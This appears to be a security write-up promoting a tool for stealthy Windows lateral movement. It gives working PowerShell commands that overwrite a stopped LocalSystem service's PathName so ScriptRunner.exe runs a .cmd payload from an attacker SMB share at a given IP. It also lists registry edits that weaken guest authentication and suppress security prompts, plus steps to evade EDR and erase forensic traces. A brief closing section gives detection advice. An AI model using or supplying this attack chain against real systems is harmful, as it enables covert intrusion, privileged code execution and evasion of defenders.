Bypassing Traditional WMIExec Detection with a File‑less WMI Lateral Movement Technique

Problem with traditional wmiexec.py

Uses Win32_Process.Create to spawn a process.

Command output is written to the ADMIN$ share, leaving clear disk artifacts.

Resulting logs and process chains are easily detected by EDR solutions.

Improved stealthy approach

Replace the PathName of a stopped service that runs as LocalSystem instead of invoking Win32_Process.

Leverage the LOLBIN ScriptRunner.exe to execute a .cmd script directly from a remote SMB share, satisfying a “no‑disk‑drop” requirement.

Redirect command output back to the attacker‑controlled SMB share, avoiding any local file writes.

Restore the original service PathName after execution to erase evidence.

Required configuration

Enable insecure guest authentication so that the LocalSystem account can access the attacker’s SMB share without credentials:

HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters\AllowInsecureGuestAuth = 1 (DWORD)

Add .cmd to the low‑risk file type whitelist to suppress security prompts when executing remote scripts:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes = .cmd

Service selection and modification

Query for a stopped service running as LocalSystem:

$TargetService = Get-CimInstance -ClassName Win32_Service -Filter "State='Stopped' AND StartName='LocalSystem'" | Select-Object -First 1

Overwrite the service PathName with a ScriptRunner command that loads the remote script:

Invoke-CimMethod -InputObject $TargetService -MethodName Change -Arguments @{ PathName = "C:\Windows\System32\scriptrunner.exe -appvscript \\192.168.122.126\share\shell.cmd" }

Start the service to trigger execution:

Invoke-CimMethod -InputObject $TargetService -MethodName StartService

Full automation – StealthyWMIExec.py

Start an SMB share on the attacker host to host the payload and receive results.

Remote‑check the target registry; if .cmd is not in LowRiskFileTypes, add it.

Perform the WMI query to locate a suitable stopped LocalSystem service.

Backup the original PathName and replace it with the ScriptRunner command pointing to the remote .cmd script.

Generate the .cmd payload that runs the desired command and writes output to the attacker SMB share.

Start the modified service; the command runs and the result is streamed back.

Automatically restore the original service PathName after execution.

Read and display the collected output (e.g., whoami, hostname).

Technical highlights

File‑less operation: the script is loaded remotely, no local disk artifacts.

No use of Win32_Process, bypassing traditional WMI detection signatures.

Execution under LocalSystem provides high‑privilege access to the SMB share without additional authentication.

Service PathName is automatically restored, leaving minimal forensic trace.

Relies on built‑in Windows binary ScriptRunner.exe, reducing malicious classification.

Defensive and detection recommendations

Monitor abnormal launches of ScriptRunner.exe with the -appvscript argument and remote UNC paths.

Audit unexpected modifications to service PathName via WMI.

Disable unnecessary AllowInsecureGuestAuth settings.

Restrict direct execution of .cmd or .ps1 scripts from remote SMB shares.

Log and alert on WMI calls to Win32_Service.Change and StartService.

Enable registry monitoring for critical service configuration keys.

Source code and further details are available at https://github.com/Ghaleb0x317374/StealthyWMIExec.py